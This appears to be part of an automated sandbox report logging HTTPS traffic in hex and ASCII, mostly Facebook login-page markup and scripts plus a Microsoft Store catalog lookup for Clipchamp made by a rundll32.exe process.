                                                                                                                                                                                    2023-01-05 07:59:13 UTC15423INData Raw: 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 6f 72 20 64 65 76 69 63 65 20 6d 61 79 20 6f 66 66 65 72 20 73 65 74 74 69 6e 67 73 20 74 68 61 74 20 61 6c 6c 6f 77 20 79 6f 75 20 74 6f 20 63 68 6f 6f 73 65 20 77 68 65 74 68 65 72 20 62 72 6f 77 73 65 72 20 63 6f 6f 6b 69 65 73 20 61 72 65 20 73 65 74 20 61 6e 64 20 74 6f 20 64 65 6c 65 74 65 20 74 68 65 6d 2e 20 54 68 65 73 65 20 63 6f 6e 74 72 6f 6c 73 20 76 61 72 79 20 62 79 20 62 72 6f 77 73 65 72 2c 20 61 6e 64 20 6d 61 6e 75 66 61 63 74 75 72 65 72 73 20 6d 61 79 20 63 68 61 6e 67 65 20 62 6f 74 68 20 74 68 65 20 73 65 74 74 69 6e 67 73 20 74 68 65 79 20
                                                                                                                                                                                    Data Ascii: s=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-m\">Your browser or device may offer settings that allow you to choose whether browser cookies are set and to delete them. These controls vary by browser, and manufacturers may change both the settings they
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15424INData Raw: 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 5c 75 30 30 32 35 32 46 65 6e 2d 55 53 5c 75 30 30 32 35 32 46 6b 62 5c 75 30 30 32 35 32 46 65 6e 61 62 6c 65 2d 61 6e 64 2d 64 69 73 61 62 6c 65 2d 63 6f 6f 6b 69 65 73 2d 77 65 62 73 69 74 65 2d 70 72 65 66 65 72 65 6e 63 65 73 26 61 6d 70 3b 68 3d 41 54 30 41 35 67 68 6e 49 52 65 5f 6a 6c 76 6e 69 58 4f 4f 63 55 6c 32 58 7a 4f 49 4d 4b 64 5a 53 36 4b 68 62 37 59 6f 65 62 77 33 30 76 72 54 32 4b 38 6a 49 38 47 34 31 69
                                                                                                                                                                                    Data Ascii: 3C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.mozilla.org\u00252Fen-US\u00252Fkb\u00252Fenable-and-disable-cookies-website-preferences&amp;h=AT0A5ghnIRe_jlvniXOOcUl2XzOIMKdZS6Khb7Yoebw30vrT2K8jI8G41i
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15425INData Raw: 5f 48 79 71 56 2d 6e 69 74 62 36 55 4e 49 79 64 6e 54 54 54 41 5a 69 45 30 73 79 65 78 4a 36 70 4b 63 70 54 6f 44 69 4e 42 2d 58 50 30 33 46 41 65 52 30 64 54 68 64 57 4c 61 34 45 38 55 33 35 4b 5f 65 66 6f 74 30 52 66 6d 35 6d 4c 5a 4d 73 42 5f 32 4d 39 36 7a 6a 79 6c 74 53 6d 49 77 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 4f 70 65 72 61 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 5c 2f 75 6c 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f
                                                                                                                                                                                    Data Ascii: _HyqV-nitb6UNIydnTTTAZiE0syexJ6pKcpToDiNB-XP03FAeR0dThdWLa4E8U35K_efot0Rfm5mLZMsB_2M96zjyltSmIw\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"asynclazy\">Opera\u003C\/a>\u003C\/li>\u003C\/ul>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15427INData Raw: 37 39 5f 30 5f 39 5f 62 72 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 4d 61 67 79 61 72 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 47 65 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 4e 65 64 65 72 6c 61 6e 64 73 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 4e 4f 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 4e 6f 72 73 6b 20 28 62 6f 6b 6d 5c 75 30 30 65 35 6c 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 63 6d 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 50 6f 6c 73 6b 69 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 64 5f 42 49 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 50 6f 72 74 75 67 75 5c 75 30 30 65
                                                                                                                                                                                    Data Ascii: 79_0_9_br",{"__html":"Magyar"},1],["__markup_3310c079_0_a_Ge",{"__html":"Nederlands"},1],["__markup_3310c079_0_b_NO",{"__html":"Norsk (bokm\u00e5l)"},1],["__markup_3310c079_0_c_cm",{"__html":"Polski"},1],["__markup_3310c079_0_d_BI",{"__html":"Portugu\u00e
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15428INData Raw: 5f 76 5f 4e 52 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 64 35 35 63 5c 75 61 64 36 64 5c 75 63 35 62 34 22 7d 2c 31 5d 5d 2c 22 65 6c 65 6d 65 6e 74 73 22 3a 5b 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 31 5f 4b 65 22 2c 22 75 5f 30 5f 30 5f 43 49 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 74 35 22 2c 22 67 6c 6f 62 61 6c 43 6f 6e 74 61 69 6e 65 72 22 2c 32 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 32 5f 38 33 22 2c 22 63 6f 6e 74 65 6e 74 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 6a 42 22 2c 22 6c 6f 67 69 6e 5f 66 6f 72 6d 22 2c 32 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 30 5f 4b 6f 22 2c 22 75 5f 30 5f 32
                                                                                                                                                                                    Data Ascii: _v_NR",{"__html":"\ud55c\uad6d\uc5b4"},1]],"elements":[["__elem_a588f507_0_1_Ke","u_0_0_CI",1],["__elem_a588f507_0_0_t5","globalContainer",2],["__elem_a588f507_0_2_83","content",1],["__elem_835c633a_0_0_jB","login_form",2],["__elem_f46f4946_0_0_Ko","u_0_2
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15430INData Raw: 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 74 35 22 5d 2c 5b 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 74 35 22 7d 5d 5d 5d 2c 5b 22 4b 65 79 62 6f 61 72 64 41 63 74 69 76 69 74 79 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 46 6f 63 75 73 52 69 6e 67 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 45 72 72 6f 72 4d 65 73 73 61 67 65 43 6f 6e 73 6f 6c 65 22 2c 22 6c 69 73 74 65 6e 46 6f 72 55 6e 63 61 75 67 68 74 45 72 72 6f 72 73 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 48 61 72 64 77 61 72 65 43 53 53 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 57 65 62 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 53 65 6c 65 63 74 6f
                                                                                                                                                                                    Data Ascii: ogger","init",["__elem_a588f507_0_0_t5"],[[{"__m":"__elem_a588f507_0_0_t5"}]]],["KeyboardActivityLogger","init",[],[]],["FocusRing","init",[],[]],["ErrorMessageConsole","listenForUncaughtErrors",[],[]],["HardwareCSS","init",[],[]],["WebCookieLocaleSelecto
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15431INData Raw: 22 5d 2c 5b 22 46 6c 69 70 44 69 72 65 63 74 69 6f 6e 4f 6e 4b 65 79 70 72 65 73 73 22 5d 2c 5b 22 42 72 6f 77 73 65 72 50 72 65 66 69 6c 6c 4c 6f 67 67 69 6e 67 22 2c 22 69 6e 69 74 50 61 73 73 77 6f 72 64 46 69 65 6c 64 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c 5b 7b 22 70 61 73 73 77 6f 72 64 46 69 65 6c 64 49 44 22 3a 22 70 61 73 73 22 7d 5d 5d 2c 5b 22 4c 6f 67 69 6e 46 6f 72 6d 54 6f 67 67 6c 65 22 2c 22 69 6e 69 74 54 6f 67 67 6c 65 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 33 5f 2b 6e 22 2c 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 34 5f 6f 54 22 2c 22 5f 5f 65 6c 65 6d 5f 37 30 62 31 36 63 36 39 5f 30 5f 30 5f 31 77 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 33 5f 2b
                                                                                                                                                                                    Data Ascii: "],["FlipDirectionOnKeypress"],["BrowserPrefillLogging","initPasswordFieldLogging",[],[{"passwordFieldID":"pass"}]],["LoginFormToggle","initToggle",["__elem_a588f507_0_3_+n","__elem_a588f507_0_4_oT","__elem_70b16c69_0_0_1w"],[{"__m":"__elem_a588f507_0_3_+
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15432INData Raw: 66 62 61 0d 0a 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 22 73 64 22 5d 5d 2c 5b 22 52 65 71 75 69 72 65 44 65 66 65 72 72 65 64 52 65 66 65 72 65 6e 63 65 22 2c 22 75 6e 62 6c 6f 63 6b 22 2c 5b 5d 2c 5b 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 22 63 73 73 22 5d 5d 2c 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 5d 2c 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 5b 22 53 65 72
                                                                                                                                                                                    Data Ascii: fbaBanzaiScuba_DEPRECATED","PageTransitions","Animation"],"sd"]],["RequireDeferredReference","unblock",[],[["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED","PageTransitions","Animation"],"css"]],["TimeSliceImpl"],["HasteSupportData"],["Ser
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15434INData Raw: 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 39 2f 72 2f 52 2d 70 6f 45 50 65 44 52 31 38 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 56 41 68 63 68 70 46 51 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6f 2f 72 2f 43 78 73 55 33 34 2d 6f 39 51 58 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35
                                                                                                                                                                                    Data Ascii: z" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/R-poEPeDR18.js?_nc_x=Ij3Wp8lg5Kz" as="script" nonce="VAhchpFQ" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/r/CxsU34-o9QX.js?_nc_x=Ij3Wp8lg5
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15435INData Raw: 63 68 70 46 51 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 66 69 72 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 56 41 68 63 68 70 46 51 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 7b 64 69 73 70 6c 61 79 52 65 73 6f 75 72 63 65 73
                                                                                                                                                                                    Data Ascii: chpFQ">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("first_response",n);})})();</script><script nonce="VAhchpFQ">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletArrive({displayResources
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15437INData Raw: 66 61 75 6c 74 5f 72 61 74 65 3a 31 30 30 30 2c 6c 69 74 65 5f 64 65 66 61 75 6c 74 5f 72 61 74 65 3a 31 30 30 2c 69 6e 74 65 72 61 63 74 69 6f 6e 5f 74 6f 5f 6c 69 74 65 5f 63 6f 69 6e 66 6c 69 70 3a 7b 41 44 53 5f 49 4e 54 45 52 46 41 43 45 53 5f 49 4e 54 45 52 41 43 54 49 4f 4e 3a 30 2c 61 64 73 5f 70 65 72 66 5f 73 63 65 6e 61 72 69 6f 3a 30 2c 61 64 73 5f 77 61 69 74 5f 74 69 6d 65 3a 30 2c 45 76 65 6e 74 3a 31 7d 2c 69 6e 74 65 72 61 63 74 69 6f 6e 5f 74 6f 5f 63 6f 69 6e 66 6c 69 70 3a 7b 41 44 53 5f 49 4e 54 45 52 46 41 43 45 53 5f 49 4e 54 45 52 41 43 54 49 4f 4e 3a 31 2c 61 64 73 5f 70 65 72 66 5f 73 63 65 6e 61 72 69 6f 3a 31 2c 61 64 73 5f 77 61 69 74 5f 74 69 6d 65 3a 31 2c 45 76 65 6e 74 3a 31 30 30 7d 2c 65 6e 61 62 6c 65 5f 68 65 61 72 74
                                                                                                                                                                                    Data Ascii: fault_rate:1000,lite_default_rate:100,interaction_to_lite_coinflip:{ADS_INTERFACES_INTERACTION:0,ads_perf_scenario:0,ads_wait_time:0,Event:1},interaction_to_coinflip:{ADS_INTERFACES_INTERACTION:1,ads_perf_scenario:1,ads_wait_time:1,Event:100},enable_heart
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15438INData Raw: 4f 66 68 39 53 30 61 70 4f 77 4e 62 4b 67 49 4e 74 66 53 38 4b 5f 6a 4f 53 31 38 44 6c 50 4f 46 51 34 79 2d 71 47 5f 30 71 66 79 6a 41 6c 79 35 4a 66 31 71 62 74 4d 59 63 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 34 38 36 35 22 2c 5b 22 52 65 61 63 74 44 4f 4d 4c 65 67 61 63 79 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 4c 65 67 61 63 79 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 41 61 32 4a 41 69 73 37 6a 79 4a 6f 35 76 68 6e 34 5a 46 43 52 4a 63 2d 49 38 6d 4a 49 6d 45 4f 57 66 33 33 50 5a 71 44 5a 32 44 66 67 7a 67 61 5a 72 53 79 37 54 6e 4f 32 42 58 46 79 53 4b 76 32 41 43 53 74 2d 49 42 47 31 6b 50 6c 30 33 6b 5f 34 76 79 4b 73 77 4e 63 32 30 44 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 30 38 38 35 37 22
                                                                                                                                                                                    Data Ascii: Ofh9S0apOwNbKgINtfS8K_jOS18DlPOFQ4y-qG_0qfyjAly5Jf1qbtMYc"]},-1],["cr:4865",["ReactDOMLegacy_DEPRECATED"],{__rc:["ReactDOMLegacy_DEPRECATED","Aa2JAis7jyJo5vhn4ZFCRJc-I8mJImEOWf33PZqDZ2DfgzgaZrSy7TnO2BXFySKv2ACSt-IBG1kPl03k_4vyKswNc20D"]},-1],["cr:1108857"
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15440INData Raw: 6d 5f 74 72 61 63 65 22 2c 22 6d 61 72 61 75 64 65 72 22 2c 22 70 65 72 66 78 5f 63 75 73 74 6f 6d 5f 6c 6f 67 67 65 72 5f 65 6e 64 70 6f 69 6e 74 22 2c 22 71 65 78 22 2c 22 72 65 71 75 69 72 65 5f 63 6f 6e 64 5f 65 78 70 6f 73 75 72 65 5f 6c 6f 67 67 69 6e 67 22 5d 2c 73 68 6f 75 6c 64 5f 64 72 6f 70 5f 75 6e 6b 6e 6f 77 6e 5f 72 6f 75 74 65 73 3a 74 72 75 65 2c 73 68 6f 75 6c 64 5f 6c 6f 67 5f 75 6e 6b 6e 6f 77 6e 5f 72 6f 75 74 65 73 3a 66 61 6c 73 65 7d 2c 37 5d 2c 5b 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 72 65 6c 6f 61 64 4f 6e 42 6f 6f 74 6c 6f 61 64 45 72 72 6f 72 3a 74 72 75 65 7d 2c 31 30 36 37 5d 2c 5b 22 63 72 3a 36 39 32 32 30 39 22 2c 5b 22 63 61 6e 63 65 6c 49 64 6c 65 43 61 6c 6c 62 61 63 6b 42
                                                                                                                                                                                    Data Ascii: m_trace","marauder","perfx_custom_logger_endpoint","qex","require_cond_exposure_logging"],should_drop_unknown_routes:true,should_log_unknown_routes:false},7],["PageTransitionsConfig",[],{reloadOnBootloadError:true},1067],["cr:692209",["cancelIdleCallbackB
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15441INData Raw: 77 38 78 61 66 6e 51 65 6f 72 45 69 4f 30 68 41 50 32 74 2d 46 45 4f 36 6e 4e 37 35 45 4e 69 6f 4c 68 54 42 6a 58 56 30 53 33 72 65 77 73 2d 45 63 6b 58 6d 72 38 73 46 6f 7a 4d 48 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 54 72 61 63 6b 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 64 6f 6d 61 69 6e 3a 22 68 74 74 70 73 3a 2f 2f 70 69 78 65 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 22 7d 2c 33 32 35 5d 2c 5b 22 57 65 62 44 65 76 69 63 65 50 65 72 66 49 6e 66 6f 44 61 74 61 22 2c 5b 5d 2c 7b 6e 65 65 64 73 46 75 6c 6c 55 70 64 61 74 65 3a 74 72 75 65 2c 6e 65 65 64 73 50 61 72 74 69 61 6c 55 70 64 61 74 65 3a 66 61 6c 73 65 2c 73 68 6f 75 6c 64 4c 6f 67 52 65 73 6f 75 72 63 65 50 65 72 66 3a 66 61 6c 73 65 7d 2c 33 39 37 37 5d 2c 5b 22 57 65 62 53 74 6f 72 61 67 65
                                                                                                                                                                                    Data Ascii: w8xafnQeorEiO0hAP2t-FEO6nN75ENioLhTBjXV0S3rews-EckXmr8sFozMHQ"]},-1],["TrackingConfig",[],{domain:"https://pixel.facebook.com"},325],["WebDevicePerfInfoData",[],{needsFullUpdate:true,needsPartialUpdate:false,shouldLogResourcePerf:false},3977],["WebStorage
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15443INData Raw: 31 33 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 31 35 2c 38 30 36 30 33 33 5d 2c 5b 33 30 30 31 38 2c 38 30 36 30 33 33 5d 2c 5b 33 30 30 32 31 2c 35 34 30 38 32 33 5d 2c 5b 33 30 30 32 32 2c 35 34 30 38 31 37 5d 2c 5b 33 30 30 34 30 2c 38 30 36 30 33 33 5d 2c 5b 33 30 30 39 33 2c 38 30 36 30 33 33 5d 2c 5b 33 30 30 39 34 2c 38 30 36 30 33 33 5d 2c 5b 33 30 30 39 35 2c 38 30 36 30 33 33 5d 2c 5b 33 30 31 30 31 2c 35 34 31 35 39 31 5d 2c 5b 33 30 31 30 32 2c 35 34 31 35 39 31 5d 2c 5b 33 30 31 30 33 2c 35 34 31 35 39 31 5d 2c 5b 33 30 31 30 34 2c 35 34 31 35 39 31 5d 2c 5b 33 30 31 30 36 2c 38 30 36 30 33 39 5d 2c 5b 33 30 31 30 37 2c 38 30 36 30 33 39 5d 2c 5b 33 38 30 30 30 2c 35 34 31 34 32 37 5d 2c 5b 33 38 30 30 31 2c 38 30 36 36 34 33 5d 5d 7d 22 2c 66
                                                                                                                                                                                    Data Ascii: 13,838801],[30015,806033],[30018,806033],[30021,540823],[30022,540817],[30040,806033],[30093,806033],[30094,806033],[30095,806033],[30101,541591],[30102,541591],[30103,541591],[30104,541591],[30106,806039],[30107,806039],[38000,541427],[38001,806643]]}",f
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15444INData Raw: 2c 4f 37 6b 4e 4e 50 38 3a 7b 74 79 70 65 3a 22 6a 73 22 2c 73 72 63 3a 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 59 2f 72 2f 75 65 5f 4f 57 6c 6b 4c 44 5a 50 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 6e 63 3a 31 7d 7d 2c 63 6f 6d 70 4d 61 70 3a 7b 54 72 61 6e 73 70 6f 72 74 53 65 6c 65 63 74 69 6e 67 43 6c 69 65 6e 74 53 69 6e 67 6c 65 74 6f 6e 3a 7b 72 3a 5b 22 63 58 79 32 4b 6f 31 22 2c 22 31 64 36 35 55 32 6f 22 2c 22 67 6c 74 7a 56 37 32 22 5d 2c 72 64 73 3a 7b 6d 3a 5b 22 43 6f 6e 74 65 78 74 75 61 6c 43 6f 6e 66 69 67 22 2c 22 42 6c 61 64 65 52 75 6e 6e 65 72 43 6c 69 65 6e 74 22 2c 22 44 47 57 52 65 71 75 65 73 74 53 74 72 65 61 6d 43 6c
                                                                                                                                                                                    Data Ascii: ,O7kNNP8:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yY/r/ue_OWlkLDZP.js?_nc_x=Ij3Wp8lg5Kz",nc:1}},compMap:{TransportSelectingClientSingleton:{r:["cXy2Ko1","1d65U2o","gltzV72"],rds:{m:["ContextualConfig","BladeRunnerClient","DGWRequestStreamCl


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    57192.168.2.44991620.82.154.241443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:59:14 UTC15445OUTGET /v7.0/products/lookup?alternateId=PackageFamilyName&value=Clipchamp.Clipchamp_yxz26nhyzhsrt&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                    User-Agent: Install Service
                                                                                                                                                                                    MS-CV: 4oJ6+hRbqUyy8kuL.0.2.4
                                                                                                                                                                                    Host: displaycatalog.mp.microsoft.com
                                                                                                                                                                                    2023-01-05 07:59:14 UTC15445INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Length: 37439
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:59:14 GMT
                                                                                                                                                                                    Server: Kestrel
                                                                                                                                                                                    Vary: Authorization
                                                                                                                                                                                    MS-CorrelationId: ae1d8cb2-b450-4f39-98ad-5fc4ecb91cfa
                                                                                                                                                                                    MS-RequestId: 0dc4d479-8dfb-4e85-948b-83e6e3feee38
                                                                                                                                                                                    MS-CV: 4oJ6+hRbqUyy8kuL.0.2.4.4008885449.1283124932.0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    MS-ServerId: 8
                                                                                                                                                                                    MS-DocumentVersions: 9P1J8S7CCWWT|1367
                                                                                                                                                                                    2023-01-05 07:59:14 UTC15446INData Raw: 7b 22 42 69 67 49 64 73 22 3a 5b 22 39 50 31 4a 38 53 37 43 43 57 57 54 22 5d 2c 22 48 61 73 4d 6f 72 65 50 61 67 65 73 22 3a 66 61 6c 73 65 2c 22 50 72 6f 64 75 63 74 73 22 3a 5b 7b 22 4c 61 73 74 4d 6f 64 69 66 69 65 64 44 61 74 65 22 3a 22 32 30 32 32 2d 31 32 2d 31 36 54 30 35 3a 35 36 3a 34 34 2e 35 30 31 39 30 33 30 5a 22 2c 22 4c 6f 63 61 6c 69 7a 65 64 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 7b 22 46 72 61 6e 63 68 69 73 65 73 22 3a 5b 5d 2c 22 49 6d 61 67 65 73 22 3a 5b 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 30 36 39 36 39 30 31 35 34 32 32 37 39 33 31 35 36 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c
                                                                                                                                                                                    Data Ascii: {"BigIds":["9P1J8S7CCWWT"],"HasMorePages":false,"Products":[{"LastModifiedDate":"2022-12-16T05:56:44.5019030Z","LocalizedProperties":[{"Franchises":[],"Images":[{"FileId":"3006969015422793156","EISListingIdentifier":null,"BackgroundColor":"","Caption":"",
